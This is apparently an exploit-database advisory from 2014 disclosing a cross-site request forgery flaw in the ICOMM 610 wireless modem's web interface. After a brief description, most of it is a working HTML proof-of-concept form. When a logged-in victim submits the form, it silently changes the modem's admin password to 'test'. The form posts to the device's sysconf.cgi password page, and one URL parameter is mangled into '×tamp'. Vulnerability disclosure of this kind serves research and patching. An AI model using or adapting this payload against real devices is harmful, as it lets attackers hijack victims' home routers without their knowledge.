ICOMM 610 Wireless Modem Cross Site Request Forgery

`Exploit Title : ICOMM 610 Wireless Modem CSRF Vulnerability  
  
Google dork : N/A  
  
Date : 02/04/2014  
  
Exploit Author : Blessen Thomas  
  
Vendor Homepage : http://www.icommtele.com/  
  
Software Link : N/A  
  
Version : ICOMM 610  
  
Tested on : Device software version 01.01.08.991 (10/01/2010)  
  
Type of Application : Modem Web Application  
  
CVE : N/A  
  
Cross Site Request Forgery  
  
It was observed that this modem's Web Application , suffers from Cross-site  
  
request forgery through which attacker can manipulate user data via sending  
him malicious craft url.  
  
  
At attacker could change the password of the victim's account without the  
victim's knowledge as the  
  
application is not having a security token implemented.  
  
  
The Modem's application is not using any security token to prevent it  
against CSRF. You can manipulate any userdata. PoC and Exploit to change  
user password: In the POC the IP address in the POST is the modems IP  
address.  
  
  
  
<html>  
<!-- CSRF PoC --->  
<body>  
<form action="http://192.168.1.1/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">  
<input type="hidden" name="PasswdEnable" value="on" />  
<input type="hidden" name="New_Passwd" value="test" />  
<input type="hidden" name="Confirm_New_Passwd" value="test" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
`